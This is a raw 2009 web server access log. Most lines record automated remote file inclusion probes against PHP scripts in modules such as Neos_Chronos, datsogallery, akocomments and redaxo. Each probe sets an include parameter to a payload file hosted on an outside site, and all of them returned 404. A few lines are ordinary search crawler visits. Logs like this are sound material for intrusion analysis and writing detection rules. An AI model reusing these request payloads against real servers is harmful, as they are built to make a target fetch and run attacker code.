80.237.154.69 - - [26/Jun/2009:04:49:50 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:53 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:59 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:59 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:49:59 -0500] "GET //config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:50:10 -0500] "GET //config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:50:10 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:50:10 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:50:44 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:04:50:55 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:04:52:25 -0500] "GET /main.php?x=http://www.downlinedoubler.com/images/banner4.gif??? HTTP/1.1" 404 291 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:04:52:27 -0500] "GET /logs/main.php?x=http://www.downlinedoubler.com/images/banner4.gif??? HTTP/1.1" 404 296 "-""libwww-perl/5.811"
83.98.209.71 - - [26/Jun/2009:04:53:31 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:04:53:31 -0500] "GET /logs/access_log.1239062400/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:04:53:31 -0500] "GET /logs/access_log.1236384000/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:04:53:31 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:54:08 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:54:11 -0500] "GET /logs/access_log.1233619200/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:54:11 -0500] "GET /logs/access_log.1238976000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:04:54:21 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:04:55:27 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:04:55:27 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:04:55:27 -0500] "GET //modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:04:56:07 -0500] "GET /logs/access_log.1235952000//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:04:56:57 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:04:56:57 -0500] "GET /logs/access_log.1239062400/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:04:56:57 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:04:57:17 -0500] "GET /logs/access_log.1236384000/modules/Neos_Chronos/header.php?base_folder=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.142.209.134 - - [26/Jun/2009:04:58:26 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:04:58:26 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:04:58:34 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:04:58:34 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:00:52 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:00:52 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:02:07 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:02:07 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:02:40 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:02:40 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:03:09 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:03:09 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:03:30 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:03:30 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
80.237.154.69 - - [26/Jun/2009:05:04:43 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:04:43 -0500] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:04:44 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:05:04:44 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:05:04:44 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
218.30.100.97 - - [26/Jun/2009:05:05:19 -0500] "GET /logs/access_log.1241222400//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:05:05:19 -0500] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:05:05:20 -0500] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:06:02 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:06:02 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:06:02 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:06:06 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:07:09 -0500] "GET /logs/access_log.1229126400///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:08:02 -0500] "GET /logs/access_log.1229040000///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:08:10 -0500] "GET /logs/access_log.1228089600///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:09:04 -0500] "GET /logs/access_log.1225756800///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:09:28 -0500] "GET /logs/access_log.1225411200///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:09:28 -0500] "GET /logs/access_log.1229212800///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:09:29 -0500] "GET /logs/access_log.1227744000///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:10:15 -0500] "GET /logs/access_log.1233360000///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:10:33 -0500] "GET /logs/access_log.1229904000///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.11.230.36 - - [26/Jun/2009:05:11:41 -0500] "GET /logs/access_log.1237852800///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
123.125.64.38 - - [26/Jun/2009:05:13:00 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.106.196 - - [26/Jun/2009:05:15:53 -0500] "GET /logs/access_log.1156291200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [26/Jun/2009:05:16:51 -0500] "GET //ashnews.php?pathtoashnews=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:05:16:51 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:05:16:51 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:05:16:51 -0500] "GET /logs/access_log.1240272000//ashnews.php?pathtoashnews=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:17:56 -0500] "GET /logs/access_log.1234396800/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:17:56 -0500] "GET /logs/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:17:56 -0500] "GET /errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:18:30 -0500] "GET //ashnews.php?pathtoashnews=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:18:30 -0500] "GET /logs//ashnews.php?pathtoashnews=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:18:30 -0500] "GET /logs/access_log.1239926400//ashnews.php?pathtoashnews=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:18:33 -0500] "GET /logs/access_log.1239667200//ashnews.php?pathtoashnews=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:19:00 -0500] "GET /logs/access_log.1233360000/errors.php?error=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:21:40 -0500] "GET //skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:21:40 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:21:43 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:05:22:56 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.137 - - [26/Jun/2009:05:24:24 -0500] "GET /logs/access_log.1120089600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.16.182.130 - - [26/Jun/2009:05:27:26 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:05:27:26 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:05:27:26 -0500] "GET /logs/access_log.1240358400/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:05:27:39 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:05:27:39 -0500] "GET //ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:05:27:39 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:05:27:39 -0500] "GET /logs/access_log.1240272000//ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:05:29:07 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
83.98.209.71 - - [26/Jun/2009:05:29:14 -0500] "GET /logs/access_log.1241136000//ashnews.php?pathtoashnews=http://www.ital.k12.tr/id2.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.195.160 - - [26/Jun/2009:05:29:29 -0500] "GET /logs//include/write.php?dir=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
94.23.195.160 - - [26/Jun/2009:05:29:29 -0500] "GET //include/write.php?dir=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.826"
83.16.182.130 - - [26/Jun/2009:05:31:15 -0500] "GET /logs/access_log.1241827200/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.172.179.213 - - [26/Jun/2009:05:32:14 -0500] "GET /logs//include/write.php?dir=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
217.172.179.213 - - [26/Jun/2009:05:32:14 -0500] "GET //include/write.php?dir=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
80.237.154.69 - - [26/Jun/2009:05:33:42 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:42 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:42 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.112 - - [26/Jun/2009:05:33:54 -0500] "GET /logs/access_log.1135382400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.237.154.69 - - [26/Jun/2009:05:33:55 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:55 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:55 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:56 -0500] "GET /logs/access_log.1239926400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:58 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:58 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:33:58 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:34:07 -0500] "GET /logs/access_log.1239926400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:34:10 -0500] "GET /logs/access_log.1239926400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.195.124.10 - - [26/Jun/2009:05:34:21 -0500] "GET /logs/access_log.1231545600//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.195.124.10 - - [26/Jun/2009:05:34:21 -0500] "GET /logs//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
91.195.124.10 - - [26/Jun/2009:05:34:21 -0500] "GET /logs/access_log.1234656000//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.195.124.10 - - [26/Jun/2009:05:34:21 -0500] "GET //add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
80.237.154.69 - - [26/Jun/2009:05:34:32 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:34:32 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:34:32 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:05:34:36 -0500] "GET /logs/access_log.1239926400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:37:34 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:37:34 -0500] "GET /logs/access_log.1234224000/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:37:34 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:37:35 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
91.195.124.10 - - [26/Jun/2009:05:39:52 -0500] "GET /logs/access_log.1230595200//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.195.124.10 - - [26/Jun/2009:05:39:52 -0500] "GET /logs/access_log.1235260800//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.195.124.10 - - [26/Jun/2009:05:40:44 -0500] "GET /logs/access_log.1232236800//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
72.82.228.83 - - [26/Jun/2009:05:41:00 -0500] "GET /logs/access_log.1234224000/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
